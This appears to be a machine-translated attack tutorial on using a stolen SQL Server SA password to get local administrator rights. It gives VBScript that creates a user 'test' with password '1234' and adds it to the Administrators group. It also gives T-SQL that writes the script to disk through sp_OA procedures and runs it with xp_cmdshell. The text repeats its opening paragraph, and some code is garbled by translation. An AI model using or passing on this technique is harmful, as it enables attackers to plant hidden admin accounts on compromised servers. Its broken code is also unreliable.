Microsoft SQL Server SA permissions security

After obtaining the SA password, the Administrator account cannot be added because the Server Manager or "predecessors" will net.exe and Net1.exe be restricted to use. We know that VBS has a Winnt object in the Active Directory (ADSI) that manages local resources and can be used to add an administrator without relying on commands like CMD, as follows:

After obtaining the SA password, the Administrator account cannot be added because the Server Manager or "predecessors" will net.exe and Net1.exe be restricted to use. We know that VBS has a Winnt object in the Active Directory (ADSI) that manages local resources and can be used to add an administrator without relying on commands like CMD, as follows:

Set Wsnetwork=createobject ("Wscript.Network")
os= "winnt://" &wsnetwork.computername
Set ob=getobject (OS) ' Gets ADSI interface, binding
Set Oe=getobject (os& "/administrators,group") ' Property, admin Group
Set Od=ob. Create ("User", "test") ' Create user
Od. SetPassword "1234" ' Set password
Od. SetInfo ' Save
Set of=getobject (os& "/test", user) ' Gets the user
Oe.add os& "/test"

Save the above code as 1.vbs, and then execute with the command "cscript 1.vbs", which adds a user with a system name of test and a password of 1234. The code executed in Query Analyzer is as follows:

Declare @o int, @f int, @t int, @ret int
exec sp_oacreate ' Scripting.FileSystemObject ', @o out
exec sp_ Oamethod @o, ' CreateTextFile ', @f out, ' C:\1.vbs ', 1
exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Set Wsnetwork=cre Ateobject ("WSCRIPT.") Network ") '
exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' os= ' winnt://' &wsnetwork. ComputerName '
Exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Set ob=getobject (OS) '
exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Set oe=getobject (os& "/administrators,group") '
exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Set Od=ob. Create ("User", "test") '
exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' od. SetPassword "1234" '
exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' od. SetInfo '
Exec @ret = sp_OAMethod @f, ' WriteLine ', NULL, ' Set of=getobject (os& '/test ', user) '
exec @ret = sp_ Oamethod @f, ' WriteLine ', NULL, ' Oe.add os& '/test '

Execute the above statement, and then execute the following line of code, this line of code must be executed separately, not with the above put together to execute, or you will be prompted "C:\1.vbs is being run by another program" and cannot successfully add users:

EXEC master.. xp_cmdshell ' cscript c:\1.vbs '

If the system user did not add success, it is possible because the system user's password 1234 is too simple, does not conform to the server's complex password policy, you can consider the setting more complex, and then test. You can also use Echo to write code to 1.vbs, in the form of:

EXEC master.. xp_cmdshell ' echo Set Wsnetwork=createobject ("Wscript.Network") >>1.vbs '